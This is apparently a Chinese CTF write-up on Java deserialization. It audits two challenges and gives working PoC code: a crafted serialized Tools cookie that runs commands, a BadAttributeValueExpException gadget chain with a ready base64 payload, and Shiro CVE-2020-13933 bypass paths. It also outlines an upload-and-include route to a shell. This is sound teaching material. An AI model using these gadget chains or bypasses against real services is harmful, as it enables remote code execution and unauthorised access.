从CTF题学Java反序列化(二)

最新推荐文章于 2024-12-19 17:00:00 发布
原创 最新推荐文章于 2024-12-19 17:00:00 发布 · 699 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #开发语言 #spring #算法

文章描述了一种SpringMVC项目中的安全漏洞,涉及序列化和反序列化功能导致命令执行。攻击者通过构造恶意Cookie,利用特定的序列化机制和Shiro权限绕过,执行了命令并可能导致系统安全风险。
部署运行你感兴趣的模型镜像

springmvcdemo

先过了一遍源码,看了一下功能

showpic.form?file=有类似于文件包含的功能

uploadpic.form可以上传文件,但是需要session中group为webmanager

Tools.class有序列化与反序列化功能,其中Tools自己这个类可被序列化,并且实现了readObject方法还有个危险函数ProcessBuilder((String[])obj)).start()

题目正常功能是对ClientInfo类存取session内容进行序列化反序列化,但是这个cinfo内容根据代码逻辑来看实际上是用户可控的

然后看到Tools类和ClientInfo类的serialVersionUID相同,为反序列化Tools类创造了条件

预期解

通过ClientInfoFilter类中调用Tools.parse对传入cookie内容直接进行反序列化的漏洞,加上Tools类中有ProcessBuilder((String[])obj)).start()函数可以执行命令,以及serialVersionUID相同,我们可以直接构造序列化Tools类,然后修改cookie,触发反序列化漏洞达成命令执行

注意ProcessBuilder传入的是String[],我们可以直接本地构造Tools类,注意testCall[]的public属性,或者直接在类中初始化命令也可:

public class Tools implements Serializable {
    private static final long serialVersionUID = 1L;
    
    public static Object parse(byte[] bytes) throws Exception {
        ......
    }
    public String testCall[];
    public static byte[] create(Object obj) throws Exception {
        ......
    }
    
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        ......
    }
    //public String testCall[] = {"bash","-c","open /System/Applications/Calculator.app"};
}

然后Poc:

import com.tools.Tools;
import java.util.Base64;

public class Poc {
    public static void main(String[] args) throws Exception {
        Tools evil = new Tools();
        String cmd[] = {"bash","-c","open /System/Applications/Calculator.app"};
        evil.testCall = cmd; // 这里我们前面修改了public属性所以可以直接改
        byte[] bytes = Tools.create(evil);
        Base64.Encoder encoder = Base64.getEncoder();
        System.out.println(encoder.encodeToString(bytes));
    }
}

然后得到base64后的序列化值修改cookie后触发弹计算器:

非预期

上传需要group为webmanager,但是我们可以伪造session:

然后就可以正常上传文件了,文件上传没有检测,上传目录是WEB-INF/resource/,但是文件包含showpic.form?file=当文件后缀为jsp时,工作目录是WEB-INF/且无法路径穿越,所以尝试上传时路径穿越:

然后利用文件包含执行拿shell

javaweb

运行起来是个登录页面,所以首先看到LoginController.classLoginController,发现使用shiro的AuthenticationToken来认证用户名密码,百度了解了一下:

继续看到在MyRealm.class重写了doGetAuthenticationInfo,判断用户名为admin,密码随机生成

  • IndexController.class对cookie进行了序列化反序列化操作
  • MyFilter.classAllFilter.classIAllFilter.class对url进行解析

但是这里出现了一个问题,shiro-1.5.3版本存在CVE-2020-13933权限绕过,具体原理主要是shiro层在处理url上和spring上存在差异,主要是在处理;上的问题,通过构造含有;符号的url即可绕过shiro在权限上的处理

这道题对url的处理基本与CVE-2020-13933一致,所以可以使用以下path绕过

/index/%3b/admin
/index/'/admin
/index/select/admin
/index/union/admin

看到展示了访问日志,并没有其他功能,继续审计源码

Tools类的exeCmd实现了命令执行:

LogHandler类的invoke方法和toString方法分别都调用了exeCmd实现了写日志和读日志功能

现在命令执行的点和反序列化的点都找到了,剩下就是需要找到一条将其连起来的利用链

在之前在cc链中注意到一个能触发toString的类BadAttributeValueExpException,它重写的readObject函数会自动调用类属性的toString方法

这个BadAttributeValueExpException是原生类,jdk8下可以使用,不需要考虑环境问题

需要注意这里System.getSecurityManager为空,就是当前的jvm环境不能启用安全管理器

利用链:

BadAttributeValueExpException.readObject()
        -> valObj.toString() -> LogHandler.toString()
        -> Tools.exeCmd()

模仿cc5中BadAttributeValueExpException的用法,完成调用链

构造poc:

//Poc.java
import java.lang.reflect.Field;
import javax.management.BadAttributeValueExpException;
import com.ctf.javaweb.tools.LogHandler;
import com.ctf.javaweb.tools.Tools;

public class Poc {
    public static void main(String[] args) throws Exception{
    LogHandler logHandler = new LogHandler();
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
    Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
    field.setAccessible(true);
    field.set(badAttributeValueExpException, logHandler);
    String datas = Tools.base64Encode(Tools.serialize(badAttributeValueExpException));
    System.out.println(datas);
    }
}
//com/ctf/javaweb/tools/LogHandler.java
package com.ctf.javaweb.tools;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.util.HashSet;

public class LogHandler extends HashSet implements InvocationHandler {
    private static final long serialVersionUID = 1L;
    private Object target;
    private String readLog = "open /System/Applications/Calculator.app";
    private String writeLog = "echo /test >> /tmp/accessLog";
    
    public LogHandler() {}
    
    public LogHandler(Object target) {
        this.target = target;
    }
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        Tools.exeCmd(this.writeLog.replaceAll("/test", (String)args[0]));
        return method.invoke(this.target, args);
    }
    
    public String toString() {
        return Tools.exeCmd(this.readLog);
    }
}
rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIACEIABmZvcm1hdEkACmxpbmVOdW1iZXJMAA9jbGFzc0xvYWRlck5hbWVxAH4ABUwADmRlY2xhcmluZ0NsYXNzcQB+AAVMAAhmaWxlTmFtZXEAfgAFTAAKbWV0aG9kTmFtZXEAfgAFTAAKbW9kdWxlTmFtZXEAfgAFTAANbW9kdWxlVmVyc2lvbnEAfgAFeHABAAAACXQAA2FwcHQAA1BvY3QACFBvYy5qYXZhdAAEbWFpbnBwc3IAH2phdmEudXRpbC5Db2xsZWN0aW9ucyRFbXB0eUxpc3R6uBe0PKee3gIAAHhweHNyACBjb20uY3RmLmphdmF3ZWIudG9vbHMuTG9nSGFuZGxlcgAAAAAAAAABAgADTAAHcmVhZExvZ3EAfgAFTAAGdGFyZ2V0cQB+AAFMAAh3cml0ZUxvZ3EAfgAFeHIAEWphdmEudXRpbC5IYXNoU2V0ukSFlZa4tzQDAAB4cHcMAAAAED9AAAAAAAAAeHQAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHBwdAAcZWNobyAvdGVzdCA+PiAvdG1wL2FjY2Vzc0xvZw==

修改cookie的userinfo字段,刷新页面

您可能感兴趣的与本文相关的镜像

Wan2.2-T2V-A5B

Wan2.2-T2V-A5B

文生视频
Wan2.2

Wan2.2是由通义万相开源高效文本到视频生成模型,是有​50亿参数的轻量级视频生成模型,专为快速内容创作优化。支持480P视频生成,具备优秀的时序连贯性和运动推理能力

why811
关注
[渗透测试笔记] 14.php反序列化及利用原理
H4ppyD0g的博客
09-30 850
php序列化与反序列化 php序列化就是将复杂的数据类型(比如说数组,字典,或者一个对象)转换为字符串,方便传输或者存库等操作,并且之后还能后恢复成原来的数据类型的过程。这样可以在不用这个数据的时候让它占用尽可能少的空间。 要注意的是,序列化只是对他的变量进行序列化,类中的函数是不会参与进来的。 php序列化与反序列化的函数 serialize() 用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 unseriali
CTFSHOW web入门 java反序列化篇 web855
羽的博客
12-13 2550
ctfshow java反序列化
CTF:记一次简单的Java反序列化
weixin_44770698的博客
11-20 1413
CTF:记一次简单的Java反序列化
PHP反序列化习笔记(CTF
就是我的博客
08-26 1916
ctf中php反序列化
CTFJava 反编译&XXE&反序列化
qi_SJQ_的博客
03-02 6245
1.Java 常考点及出思路: 考点技术:xxe,spel 表达式,反序列化,文件安全,最新框架插件漏洞等。 一般都会设法间接给出源码或相关配置提示文件,间接性源码或直接源码体现等形式,否则单纯黑盒难度比较大。 ctf web信息泄露总结: 参考:https://www.cnblogs.com/xishaonian/p/7628153.html 00x1 .ng 源码泄露 00x2 git 源码泄露 00x3 .DS_Store 文件泄漏 00x4 网站备份压缩文件 00x5 SVN 导致文件泄露 00.
CTFJava反序列化
why811的博客
08-18 1695
我们可以看到cookie里面返回了Java序列化内容,带着cookie访问返回了hello {{username}}的字符,说明我们传入的cookie被反序列化了。其实看到LogHandler不能反序列化的时候,直接一口否定了他的可利用性,并没有去尝试,那么为什么不实际尝试一下呢?其实再仔细一点,可以发现这个类继承了HashSet,HashSet实现了Serializable接口,貌似可以搞事。(但是打final的时候是没有公网的,附件只有源码,需要去靶机上面把本地repo拖下来。
CTF-反序列化
qq_61774705的博客
08-15 5383
反序列化
CTF中的反序列化
weixin_50372036的博客
06-25 1157
其次是wakeup,wakeup只需要把序列化字串的对象属性个数1改为别的数字就行了,但是注意这里file 的类型是private,所以打印出来的串是有不可见字符%00的,不要复制出来自己base,不然结果就不一样了。方法有一个CVE漏洞,CVE-2016-7124,在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。传入s中,就得到了执行phpinfo后的界面,完成了执行流程的改变。
CTF之think_java反序列化完整案例
qq_36585338的博客
11-30 1241
【代码】CTF之think_java反序列化完整案例。
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
Java CTF夺旗:反编译、XXE与反序列化详解】 在网络安全领域,尤其是CTF(Capture The Flag)竞赛中,Java技术经常成为关键考点,涉及到的知识点包括但不限于反编译、XXE(XML External Entity)攻击、反序列化...
CTF-web_php_serialize反序列化
Be Smart
02-24 1017
一.根据目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
java反序列化漏洞在CTF中的利用
m0_64893612的博客
03-01 1902
序列化指的是将对象或数据结构转换为可存储或传输的格式的过程,实现的方法是;反序列化则反之,实现的方法是,可以简单地理解为将文件压缩和解压缩的过程。与PHP中反序列互相触发魔法函数导致的漏洞成因不同,java反序列化漏洞的成因主要是由于java序列化和反序列化机制的设计特点所致,简单地讲,只要反序列化代码中含有危险的命令代码,且该代码的参数是可控的,那它就存在该漏洞。漏洞原理在我今天这里不是重要的,我主要想记录的是该漏洞的利用方式。通常在解中如果你看到一段字符串以rO0AB。
java反序列化利用工具
07-06
java反序列化 weblogic反序列化
CTF-反序列化(持续更新)
m0_74317362的博客
07-27 2014
魔术方法__construct() 当一个对象创建时自动调用__destruct() 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)__sleep() 使**用serialize()函数时触发__wakeup 使用unserialse()**函数时会自动调用__toString 当一个对象被当作一个字符串被调用。__call() 在对象上下文中调用不可访问的方法时触发__callStatic() 在静态上下文中调用不可访问的方法时触发。
CTF知识集-反序列化
星河梦瑾的博客
12-19 2173
反序列化的一些小方法
CTFSHOW web入门 java反序列化篇(更新中)
羽的博客
12-07 6465
ctfshow web入门 java反序列化
CTFjava反序列-2020-网鼎杯-朱雀组-Web-think_java
(∪.∪ )...zzz的博客
06-13 3815
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
CtfshowJava反序列化
weixin_56537388的博客
08-15 701
发现进入URLsteamhander,他的hashcode使用了getAddress,我们最终要做的就是调用getaddress,获取DNS解析。调用hashmap最后调用的是url的hashcode方法,在最后调用getaddress。重写是子类对父类可以访问方法的重新编写,返回值和形参都不能改变,可以看到,put的时候调用了hashcode,不是-1了。,子类对象赋值给父类使用,但是不能访问在子类特有的方法。这里的初始值是-1,只有为-1才能传数据。ysoserial工具。这里使用了重写的概念。
p85 CTF夺旗-JAVA考点反编译&XXE&反序列化
weixin_43263566的博客
03-28 2290
p85 CTF夺旗-JAVA考点反编译&XXE&反序列化
ctf-java反序列化
最新发布
02-09
### CTF竞赛中的Java反序列化 #### 漏洞利用方法 在CTF竞赛中,Java反序列化漏洞通常涉及构造恶意的序列化对象,使目标程序在反序列化过程中执行任意代码。为了实现这一点,参赛者可能会使用专门设计的工具来生成有效的payload。 例如,在某些场景下,`Ysoserial` 工具可以帮助创建针对不同框架和服务端组件的有效载荷[^1]。该工具支持多种gadget链,每种都对应不同的环境和技术栈,从而增加了攻击成功的可能性。通过研究并实践这些技术,选手能够更好地理解和应对实际世界里的同类威胁。 此外,还有其他一些自动化平台如 `Java-Chains/web-chains` 提供了Web界面下的Payload生成服务,不仅限于传统的Java反序列化,还包括Hessian协议等多种形式的漏洞利用方式[^2]。 #### 防护措施建议 考虑到上述提到的风险因素,采取适当的安全策略显得尤为重要: - **替代方案的选择**:尽可能采用更为安全的数据交换格式代替默认的Java序列化机制,比如JSON或XML等不易受此类型攻击影响的形式[^3]。 - **严格的输入校验**:确保所有传入系统的数据都被充分过滤和验证;特别是那些可能参与反序列化进程的信息项应接受额外的关注与审查。 - **实施白名单制度**:仅允许预定义的一组可信类来进行实例恢复工作,以此降低未知风险带来的不确定性。 - **定期维护更新**:及时安装最新的补丁包以封堵已发现的安全缺陷,并持续跟踪官方发布的公告以便第一时间响应新出现的问。 - **强化权限管理**:遵循最小特权原则设置进程权限级别,即使发生意外情况也能有效遏制损害范围进一步扩大。 ```java // 示例代码展示如何限制可加载的类列表作为简单防护手段的一部分 public class SafeDeserializer { private static final Set<String> ALLOWED_CLASSES = new HashSet<>(Arrays.asList( "com.example.SafeClass", "another.package.TrustedType" )); public Object deserialize(InputStream inputStream) throws Exception { ObjectInputStream ois = new CustomObjectInputStream(inputStream, ALLOWED_CLASSES); return ois.readObject(); } } ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值